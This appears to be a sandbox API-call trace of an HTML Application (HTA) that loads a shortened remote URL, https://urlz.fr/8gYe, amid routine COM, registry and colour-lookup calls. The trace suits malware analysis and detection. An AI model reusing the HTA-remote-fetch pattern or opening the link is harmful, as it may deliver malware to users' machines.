[0071.859] IInternetProtocolInfo:ParseUrl (in: This=0x74cc8c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x843720, cchResult=0xc, pcchResult=0x33e3f4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x33e3f4*=0xc) returned 0x0
[0071.859] IUnknown:Release (This=0x74cc8c7c) returned 0x1
[0071.860] DllGetClassObject (in: rclsid=0x852e58*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75ac4430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e2c0 | out: ppv=0x33e2c0*=0x74cc8c70) returned 0x0
[0071.860] IUnknown:QueryInterface (in: This=0x74cc8c70, riid=0x75aeaadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e3ac | out: ppvObject=0x33e3ac*=0x74cc8c7c) returned 0x0
[0071.860] IUnknown:Release (This=0x74cc8c70) returned 0x1
[0071.860] IInternetProtocolInfo:ParseUrl (in: This=0x74cc8c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x843720, cchResult=0xc, pcchResult=0x33e404, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33e404*=0x0) returned 0x800c0011
[0071.860] IUnknown:Release (This=0x74cc8c7c) returned 0x1
[0071.860] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0071.860] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0071.860] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0071.861] IUnknown:Release (This=0x84c09c) returned 0x2
[0071.861] GetDC (hWnd=0x0) returned 0x10108f9
[0071.861] GetDeviceCaps (hdc=0x10108f9, index=88) returned 96
[0071.861] ReleaseDC (hWnd=0x0, hDC=0x10108f9) returned 1
[0071.861] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000
[0071.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33ec40 | out: phkResult=0x33ec40*=0x14c) returned 0x0
[0071.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33ec44 | out: phkResult=0x33ec44*=0x21c) returned 0x0
[0071.862] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x33ec00 | out: phkResult=0x33ec00*=0x0) returned 0x2
[0071.862] RegOpenKeyExW (in: hKey=0x14c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x33ec00 | out: phkResult=0x33ec00*=0x0) returned 0x2
[0071.862] RegCloseKey (hKey=0x0) returned 0x6
[0071.862] RegCloseKey (hKey=0x0) returned 0x6
[0071.862] RegCloseKey (hKey=0x14c) returned 0x0
[0071.862] RegCloseKey (hKey=0x21c) returned 0x0
[0071.862] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76220000
[0071.862] GetProcAddress (hModule=0x76220000, lpProcName="InitializeSRWLock") returned 0x77e58456
[0071.862] GetProcAddress (hModule=0x76220000, lpProcName="AcquireSRWLockExclusive") returned 0x77e529f1
[0071.862] GetProcAddress (hModule=0x76220000, lpProcName="AcquireSRWLockShared") returned 0x77e52560
[0071.862] GetProcAddress (hModule=0x76220000, lpProcName="ReleaseSRWLockExclusive") returned 0x77e529ab
[0071.863] GetProcAddress (hModule=0x76220000, lpProcName="ReleaseSRWLockShared") returned 0x77e525a9
[0071.863] RtlInitializeConditionVariable () returned 0x85dfb4
[0071.863] IUnknown:Release (This=0x74cc8cb0) returned 0x1
[0071.865] IUnknown_QueryService (in: punk=0x74cc96a4, guidService=0x7495880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7495880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x854fb0 | out: ppvOut=0x854fb0*=0x0) returned 0x80004005
[0071.865] IUnknown:QueryInterface (in: This=0x74cc96a4, riid=0x75c742d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f988 | out: ppvObject=0x33f988*=0x74cc96b8) returned 0x0
[0071.865] IServiceProvider:QueryService (in: This=0x74cc96b8, guidService=0x7495880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7495880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x854fb0 | out: ppvObject=0x854fb0*=0x0) returned 0x80004005
[0071.865] IUnknown:Release (This=0x74cc96b8) returned 0x1
[0071.865] IInternetSecurityManager:SetSecuritySite (This=0x856f08, pSite=0x855694) returned 0x0
[0071.865] IUnknown:Release (This=0x855694) returned 0x0
[0071.865] IUnknown:AddRef (This=0x855694) returned 0x28
[0071.865] IUnknown:QueryInterface (in: This=0x855694, riid=0x75ad61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f9c0 | out: ppvObject=0x33f9c0*=0x855698) returned 0x0
[0071.865] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x856f30 | out: ppvObject=0x856f30*=0x0) returned 0x80004002
[0071.865] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x856f2c | out: ppvObject=0x856f2c*=0x0) returned 0x80004002
[0071.865] IServiceProvider:QueryService (in: This=0x855698, guidService=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x856f28 | out: ppvObject=0x856f28*=0x74cc96bc) returned 0x0
[0071.865] IUnknown:Release (This=0x855698) returned 0x0
[0071.866] CoTaskMemAlloc (cb=0x6d) returned 0x85f828
[0071.866] CoTaskMemAlloc (cb=0x9) returned 0x851688
[0071.868] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0071.872] IsCharSpaceW (wch=0x48) returned 0
[0071.872] IsCharAlphaNumericW (ch=0x5c) returned 0
[0071.872] IsCharSpaceW (wch=0x5c) returned 0
[0071.872] IsCharSpaceW (wch=0x41) returned 0
[0071.872] IsCharAlphaNumericW (ch=0x20) returned 0
[0071.872] IsCharSpaceW (wch=0x20) returned 1
[0071.872] IsCharSpaceW (wch=0x7b) returned 0
[0071.872] IsCharSpaceW (wch=0x20) returned 1
[0071.872] IsCharAlphaNumericW (ch=0x7b) returned 0
[0071.872] IsCharSpaceW (wch=0x62) returned 0
[0071.872] IsCharAlphaNumericW (ch=0x3a) returned 0
[0071.872] IsCharSpaceW (wch=0x3a) returned 0
[0071.875] IsCharAlphaNumericW (ch=0x3a) returned 0
[0071.875] IsCharSpaceW (wch=0x75) returned 0
[0071.875] IsCharAlphaNumericW (ch=0x28) returned 0
[0071.875] IsCharSpaceW (wch=0x28) returned 0
[0071.875] IsCharAlphaNumericW (ch=0x28) returned 0
[0071.875] IsCharSpaceW (wch=0x23) returned 0
[0071.875] IsCharSpaceW (wch=0x23) returned 0
[0071.875] IsCharSpaceW (wch=0x7d) returned 0
[0071.875] IsCharAlphaNumericW (ch=0x7d) returned 0
[0071.876] IsCharSpaceW (wch=0x29) returned 0
[0071.876] IsCharSpaceW (wch=0x75) returned 0
[0071.876] IsCharSpaceW (wch=0x75) returned 0
[0071.876] IsCharSpaceW (wch=0x29) returned 0
[0071.876] CoTaskMemFree (pv=0x85f828)
[0071.876] CoTaskMemFree (pv=0x851688)
[0071.876] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76720000
[0071.876] GetProcAddress (hModule=0x76720000, lpProcName=0x6) returned 0x76723e59
[0071.876] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14
[0071.877] IsOS (dwOS=0x25) returned 1
[0071.877] GetSysColor (nIndex=26) returned 0xcc6600
[0071.877] IsOS (dwOS=0x25) returned 1
[0071.877] GetSysColor (nIndex=5) returned 0xffffff
[0071.877] GetSysColor (nIndex=8) returned 0x0
[0071.882] wcstol (in: _String="0,0,255", _EndPtr=0x33e61c, _Radix=10 | out: _EndPtr=0x33e61c*=",0,255") returned 0
[0071.882] wcstol (in: _String="0,255", _EndPtr=0x33e61c, _Radix=10 | out: _EndPtr=0x33e61c*=",255") returned 0
[0071.882] wcstol (in: _String="255", _EndPtr=0x33e61c, _Radix=10 | out: _EndPtr=0x33e61c*="") returned 255
[0071.882] wcstol (in: _String="128,0,128", _EndPtr=0x33e61c, _Radix=10 | out: _EndPtr=0x33e61c*=",0,128") returned 128
[0071.882] wcstol (in: _String="0,128", _EndPtr=0x33e61c, _Radix=10 | out: _EndPtr=0x33e61c*=",128") returned 0
[0071.882] wcstol (in: _String="128", _EndPtr=0x33e61c, _Radix=10 | out: _EndPtr=0x33e61c*="") returned 128
[0071.886] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0
[0071.886] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0
[0071.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x33f6d4 | out: phkResult=0x33f6d4*=0x14c) returned 0x0
[0071.886] SHGetValueW (in: hkey=0x14c, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x33f6d8, pcbData=0x33f6d0*=0xa | out: pdwType=0x0, pvData=0x33f6d8, pcbData=0x33f6d0*=0xa) returned 0x2
[0071.886] RegCloseKey (hKey=0x14c) returned 0x0
[0071.896] GetAcceptLanguagesW () returned 0x0
[0071.896] GetClassNameW (in: hWnd=0x1021a, lpClassName=0x33f9a4, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0071.896] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0071.896] GetParent (hWnd=0x1021a) returned 0x10216
[0071.896] GetClassNameW (in: hWnd=0x10216, lpClassName=0x33f9a4, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0071.896] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0071.896] GetParent (hWnd=0x10216) returned 0x0
[0071.898] IMoniker:GetDisplayName (in: This=0x84fff0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x33f968 | out: ppszDisplayName=0x33f968*="https://urlz.fr/8gYe") returned 0x0
[0071.899] IUnknown:QueryInterface (in: This=0x84fff0, riid=0x748c72f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x33f940 | out: ppvObject=0x33f940*=0x84fffc) returned 0x0
[0071.899] IUriContainer:GetIUri (in: This=0x84fffc, ppIUri=0x33f970 | out: ppIUri=0x33f970*=0x84c3fc) returned 0x0
[0071.899] IUnknown:Release (This=0x84fffc) returned 0x1
[0071.899] IUnknown:AddRef (This=0x84fff0) returned 0x2
[0071.899] IUnknown:AddRef (This=0x84c3fc) returned 0x5
[0071.899] IMoniker:GetDisplayName (in: This=0x84fff0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x33f848 | out: ppszDisplayName=0x33f848*="https://urlz.fr/8gYe") returned 0x0
[0071.899] UrlGetLocationW (psz1="https://urlz.fr/8gYe") returned 0x0
[0071.899] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="https://urlz.fr/8gYe", ppmk=0x33f814*=0x0, dwFlags=0x1 | out: ppmk=0x33f814*=0x85e940) returned 0x0
[0071.899] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f80c | out: ppURI=0x33f80c*=0x84c3fc) returned 0x0
[0071.899] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f7a4 | out: pdwScheme=0x33f7a4*=0xb) returned 0x0
[0071.899] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0071.900] IUnknown:AddRef (This=0x84c3fc) returned 0x9
[0071.900] IUri:GetAbsoluteUri (in: This=0x84c3fc, pbstrAbsoluteUri=0x85e1e0 | out: pbstrAbsoluteUri=0x85e1e0*="https://urlz.fr/8gYe") returned 0x0
[0071.900] IUnknown:Release (This=0x84c3fc) returned 0x8
[0071.900] IUnknown:AddRef (This=0x85e940) returned 0x2
[0071.900] IUnknown:Release (This=0x85e940) returned 0x1
[0071.900] IUnknown:AddRef (This=0x84fff0) returned 0x3
[0071.900] IUnknown:Release (This=0x85e940) returned 0x0
[0071.900] IUnknown:AddRef (This=0x84fff0) returned 0x4
[0071.900] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f614 | out: ppvObject=0x33f614*=0x84c3fc) returned 0x0
[0071.900] IUnknown:Release (This=0x84c3fc) returned 0x6
[0071.900] IUnknown:AddRef (This=0x84c3fc) returned 0x7
[0071.900] _wcsnicmp (_String1="https", _String2="mhtml", _MaxCount=0x5) returned -5
[0071.900] IUnknown:QueryInterface (in: This=0x84fff0, riid=0x748c72f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x33f5e8 | out: ppvObject=0x33f5e8*=0x84fffc) returned 0x0
[0071.900] IUriContainer:GetIUri (in: This=0x84fffc, ppIUri=0x33f63c | out: ppIUri=0x33f63c*=0x84c3fc) returned 0x0
[0071.900] IUnknown:Release (This=0x84fffc) returned 0x4
[0071.900] IUnknown:AddRef (This=0x84fff0) returned 0x5
[0071.900] IUnknown:Release (This=0x84fff0) returned 0x4
[0071.901] IUnknown:AddRef (This=0x84c3fc) returned 0x9
[0071.901] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f614 | out: ppvObject=0x33f614*=0x84c3fc) returned 0x0
[0071.901] IUnknown:Release (This=0x84c3fc) returned 0x9
[0071.901] IUnknown:AddRef (This=0x84c3fc) returned 0xa
[0071.901] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f60c | out: pdwScheme=0x33f60c*=0xb) returned 0x0
[0071.901] GetCurrentProcessId () returned 0xbf0
[0071.901] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f614 | out: ppvObject=0x33f614*=0x84c3fc) returned 0x0
[0071.901] IUnknown:Release (This=0x84c3fc) returned 0xa
[0071.901] IUnknown:AddRef (This=0x84c3fc) returned 0xb
[0071.901] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f5e4 | out: pdwScheme=0x33f5e4*=0xb) returned 0x0
[0071.901] IUri:GetAbsoluteUri (in: This=0x84c3fc, pbstrAbsoluteUri=0x33f614 | out: pbstrAbsoluteUri=0x33f614*="https://urlz.fr/8gYe") returned 0x0
[0071.901] GetProcAddress (hModule=0x76720000, lpProcName=0x7) returned 0x76724680
[0071.901] SysStringLen (param_1="https://urlz.fr/8gYe") returned 0x14
[0071.901] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33f630 | out: ppURI=0x33f630*=0x84c3fc) returned 0x0
[0071.901] IUnknown:Release (This=0x84c3fc) returned 0xb
[0071.901] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f5c4 | out: pdwScheme=0x33f5c4*=0xb) returned 0x0
[0071.901] IUnknown:AddRef (This=0x84c3fc) returned 0xc
[0071.901] IUri:GetPropertyDWORD (in: This=0x84c3fc, uriProp=0x11, pdwProperty=0x33f3a4, dwFlags=0x0 | out: pdwProperty=0x33f3a4*=0xb) returned 0x0
[0071.901] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x33f408, pcbSecurityId=0x33f404*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f408*=0x68, pcbSecurityId=0x33f404*=0x11) returned 0x0
[0071.901] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x33f408, pcbSecurityId=0x33f404*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f408*=0x0, pcbSecurityId=0x33f404*=0x200) returned 0x800c0011
[0072.987] IUnknown:Release (This=0x84c3fc) returned 0xb
[0072.988] ParseURLW (in: pcszURL="https://urlz.fr/8gYe", ppu=0x33f5c0 | out: ppu=0x33f5c0) returned 0x0
[0072.989] GetDC (hWnd=0x0) returned 0x10108f9
[0072.989] CreateCompatibleBitmap (hdc=0x10108f9, cx=1, cy=1) returned 0x605091a
[0072.989] GetDIBits (in: hdc=0x10108f9, hbm=0x605091a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x33f190, usage=0x0 | out: lpvBits=0x0, lpbmi=0x33f190) returned 1
[0072.989] GetDIBits (in: hdc=0x10108f9, hbm=0x605091a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x33f190, usage=0x0 | out: lpvBits=0x0, lpbmi=0x33f190) returned 1
[0072.989] DeleteObject (ho=0x605091a) returned 1
[0072.989] GetSysColor (nIndex=0) returned 0xc8c8c8
[0072.989] GetSysColor (nIndex=1) returned 0x0
[0072.989] GetSysColor (nIndex=2) returned 0xd1b499
[0072.989] GetSysColor (nIndex=3) returned 0xdbcdbf
[0072.989] GetSysColor (nIndex=4) returned 0xf0f0f0
[0072.989] GetSysColor (nIndex=5) returned 0xffffff
[0072.989] GetSysColor (nIndex=6) returned 0x646464
[0072.989] GetSysColor (nIndex=7) returned 0x0
[0072.989] GetSysColor (nIndex=8) returned 0x0
[0072.989] GetSysColor (nIndex=9) returned 0x0
[0072.989] GetSysColor (nIndex=10) returned 0xb4b4b4
[0072.989] GetSysColor (nIndex=11) returned 0xfcf7f4
[0072.989] GetSysColor (nIndex=12) returned 0xababab
[0072.989] GetSysColor (nIndex=13) returned 0xff9933
[0072.989] GetSysColor (nIndex=14) returned 0xffffff
[0072.989] GetSysColor (nIndex=15) returned 0xf0f0f0
[0072.989] GetSysColor (nIndex=16) returned 0xa0a0a0
[0072.989] GetSysColor (nIndex=17) returned 0x6d6d6d
[0072.989] GetSysColor (nIndex=18) returned 0x0
[0072.989] GetSysColor (nIndex=19) returned 0x544e43
[0072.989] GetSysColor (nIndex=20) returned 0xffffff
[0072.989] GetSysColor (nIndex=21) returned 0x696969
[0072.989] GetSysColor (nIndex=22) returned 0xe3e3e3
[0072.989] GetSysColor (nIndex=23) returned 0x0
[0072.989] GetSysColor (nIndex=24) returned 0xe1ffff
[0072.989] GetSysColor (nIndex=25) returned 0x0
[0072.989] GetSysColor (nIndex=26) returned 0xcc6600
[0072.989] GetSysColor (nIndex=27) returned 0xead1b9
[0072.989] GetSysColor (nIndex=28) returned 0xf2e4d7
[0072.989] GetSysColor (nIndex=29) returned 0xff9933
[0072.990] GetSysColor (nIndex=30) returned 0xf0f0f0
[0072.990] GetSysColor (nIndex=31) returned 0x0
[0072.990] GetSysColor (nIndex=32) returned 0x0
[0072.990] GetSysColor (nIndex=33) returned 0x0
[0072.990] GetSysColor (nIndex=34) returned 0x0
[0072.990] GetSysColor (nIndex=35) returned 0x0
[0072.990] GetSysColor (nIndex=36) returned 0x0
[0072.990] GetSysColor (nIndex=37) returned 0x0
[0072.990] GetSysColor (nIndex=38) returned 0x0
[0072.990] GetSysColor (nIndex=39) returned 0x0
[0072.990] GetSysColor (nIndex=40) returned 0x0
[0072.990] GetSysColor (nIndex=41) returned 0x0
[0072.990] GetSysColor (nIndex=42) returned 0x0
[0072.990] GetSysColor (nIndex=43) returned 0x0
[0072.990] GetSysColor (nIndex=44) returned 0x0
[0072.990] GetSysColor (nIndex=45) returned 0x0
[0072.990] GetSysColor (nIndex=46) returned 0x0
[0072.990] GetSysColor (nIndex=47) returned 0x0
[0072.990] GetSysColor (nIndex=48) returned 0x0
[0072.990] GetSysColor (nIndex=49) returned 0x0
[0072.990] GetSysColor (nIndex=50) returned 0x0
[0072.990] GetSysColor (nIndex=51) returned 0x0
[0072.990] GetSysColor (nIndex=52) returned 0x0
[0072.990] GetSysColor (nIndex=53) returned 0x0
[0072.990] GetSysColor (nIndex=54) returned 0x0
[0072.990] GetSysColor (nIndex=55) returned 0x0
[0072.990] GetSysColor (nIndex=56) returned 0x0
[0072.990] GetSysColor (nIndex=57) returned 0x0
[0072.990] GetSysColor (nIndex=58) returned 0x0
[0072.990] GetSysColor (nIndex=59) returned 0x0
[0072.990] GetSysColor (nIndex=60) returned 0x0
[0072.990] GetSysColor (nIndex=61) returned 0x0
[0072.990] GetSysColor (nIndex=62) returned 0x0
[0072.990] GetSysColor (nIndex=63) returned 0x0
[0072.990] GetDeviceCaps (hdc=0x10108f9, index=38) returned 32409
[0072.990] ReleaseDC (hWnd=0x0, hDC=0x10108f9) returned 1
[0072.991] GetCursorPos (in: lpPoint=0x33f410 | out: lpPoint=0x33f410*(x=1429, y=7)) returned 1
[0072.991] GetKeyState (nVirtKey=16) returned 0
[0072.991] GetKeyState (nVirtKey=17) returned 0
[0072.991] GetKeyState (nVirtKey=18) returned 0
[0072.991] GetKeyState (nVirtKey=160) returned 0
[0072.991] GetKeyState (nVirtKey=162) returned 0
[0072.991] GetKeyState (nVirtKey=164) returned 0
[0072.992] GetProcAddress (hModule=0x76720000, lpProcName=0x8) returned 0x76723ed5
[0072.992] GetCurrentThreadId () returned 0xbf4
[0072.992] ParseURLW (in: pcszURL="https://urlz.fr/8gYe", ppu=0x33f5b0 | out: ppu=0x33f5b0) returned 0x0
[0072.992] CreateUri (in: pwzURI="https://urlz.fr/8gYe", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f594 | out: ppURI=0x33f594*=0x84c3fc) returned 0x0
[0072.992] IUnknown:AddRef (This=0x84c3fc) returned 0xd
[0072.992] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="https://urlz.fr/8gYe", pdwZone=0x33f534, dwFlags=0x0 | out: pdwZone=0x33f534*=0xffffffff) returned 0x800c0011
[0072.992] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0072.992] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0072.992] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0072.992] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="https://urlz.fr/8gYe", dwAction=0x2700, pPolicy=0x33f538, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f538*=0x0) returned 0x0
[0072.993] IUnknown:Release (This=0x84c3fc) returned 0xc
[0072.993] IUnknown:Release (This=0x84c3fc) returned 0xb
[0072.993] IUnknown:AddRef (This=0x84c3fc) returned 0xc
[0072.993] IUri:GetPropertyDWORD (in: This=0x84c3fc, uriProp=0x11, pdwProperty=0x33f36c, dwFlags=0x0 | out: pdwProperty=0x33f36c*=0xb) returned 0x0
[0072.993] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x33f3c8, pcbSecurityId=0x33f3c4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f3c8*=0x68, pcbSecurityId=0x33f3c4*=0x11) returned 0x0
[0072.993] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x33f3c8, pcbSecurityId=0x33f3c4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f3c8*=0x0, pcbSecurityId=0x33f3c4*=0x200) returned 0x800c0011
[0072.993] IUnknown:Release (This=0x84c3fc) returned 0xb
[0072.993] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x33f5ec, dwReserved=0x0 | out: ppIInternetSession=0x33f5ec*=0x857c00) returned 0x0
[0072.993] IInternetSession:RegisterNameSpace (This=0x857c00, pCF=0x74cc8c50, rclsid=0x748c9790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0072.994] IUnknown:AddRef (This=0x74cc8c50) returned 0x1
[0072.994] IInternetSession:RegisterNameSpace (This=0x857c00, pCF=0x74cc8c70, rclsid=0x748c9780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0072.994] IUnknown:AddRef (This=0x74cc8c70) returned 0x1
[0072.994] StrCmpICW (pszStr1="https://urlz.fr/8gYe", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10
[0072.994] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f55c | out: ppvObject=0x33f55c*=0x84c3fc) returned 0x0
[0072.994] IUnknown:Release (This=0x84c3fc) returned 0xb
[0072.994] IUnknown:AddRef (This=0x84c3fc) returned 0xc
[0072.994] IUnknown:AddRef (This=0x84c3fc) returned 0xd
[0072.995] IUnknown:QueryInterface (in: This=0x84c3fc, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f520 | out: ppvObject=0x33f520*=0x84c3fc) returned 0x0
[0072.995] IUnknown:Release (This=0x84c3fc) returned 0xd
[0072.995] IUnknown:AddRef (This=0x84c3fc) returned 0xe
[0072.995] IUnknown:Release (This=0x84c3fc) returned 0xd
[0072.995] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33f5a4 | out: pdwScheme=0x33f5a4*=0xb) returned 0x0
[0072.995] PostMessageW (hWnd=0x1021c, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
